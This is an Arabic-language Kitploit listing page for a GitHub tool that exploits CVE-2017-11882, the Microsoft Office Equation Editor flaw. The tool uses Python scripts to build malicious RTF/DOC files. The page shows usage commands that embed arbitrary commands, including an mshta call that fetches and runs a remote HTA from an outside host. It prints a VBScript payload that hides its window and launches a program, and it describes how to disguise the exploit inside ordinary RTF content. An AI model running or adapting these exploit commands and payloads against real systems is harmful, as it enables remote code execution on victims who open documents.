Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-11882-exp — استغلال لـ CVE-2017-11882 (محرر المعادلات في Microsoft Office) مع نصوص Python لتوليد ملفات RTF/DOC خبيثة وتنفيذ أوامر عشوائية أو شيل كود عبر mshta. | Kitploit
أدوات/GitHubGitHub/lisinan988/cve-2017-11882-exp
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHublisinan988/cve-2017-11882-exp

CVE-2017-11882-exp

استغلال لـ CVE-2017-11882 (محرر المعادلات في Microsoft Office) مع نصوص Python لتوليد ملفات RTF/DOC خبيثة وتنفيذ أوامر عشوائية أو شيل كود عبر mshta.

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-11882

سكربت 43b الأصلي مأخوذ من https://github.com/embedi/CVE-2017-11882

سكربت 109b الأصلي مأخوذ من https://github.com/unamer/CVE-2017-11882/ (تحية واحترام له، الآن كود unamer أصبح قادراً على تنفيذ shellcode~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

بحث: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

تحليل التصحيح: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

استغلال PoC تجريبي: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

الاستخدام

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

استخدم mshta

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

لا يمكن أن يتجاوز طول أمر 43b 43 بايت، ولا يمكن أن يتجاوز طول أمر 109b 109 بايت

مثال استغلال لـ CVE-2017-11882 (تشغيل calc.exe كحمولة)

يحتوي مجلد example على ملف .rtf يستغل ثغرة CVE-2017-11882 ويقوم بتشغيل الآلة الحاسبة في النظام.

حول المحتوى المخصص

في الحقيقة، تعلمت تقنية المحتوى المخصص من محترفين آخرين، وقد كتبتها كسكربت منذ وقت طويل، ولم أكن أنوي نشرها، لكن بما أنني رأيت أن أحد الأشخاص في المجموعة قد نشرها بالفعل، لم يكن أمامي خيار سوى نشرها. الطريقة بسيطة جداً: يكفي فتح مستند rtf عادي باستخدام محرر نصوص، ونسخ كل المحتوى الموجود قبل {*\datastore، واستبدال المحتوى الموجود قبل {\object\objautlink\objupdate فقط، لذلك فإن كتابتها داخل سكربت أمر بسيط للغاية.

طريقة إضافة المحتوى المخصص، اختر أي سكربت:

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

المحتوى المخصص موجود في ملف input.rtf.

أما بخصوص أحدث سكربت استغلال من unamer بحجم 605 بايت، فلن أقوم بتحديثه، وإذا كنت مهتماً فقم بتعديله بنفسك.

تنزيل الأداة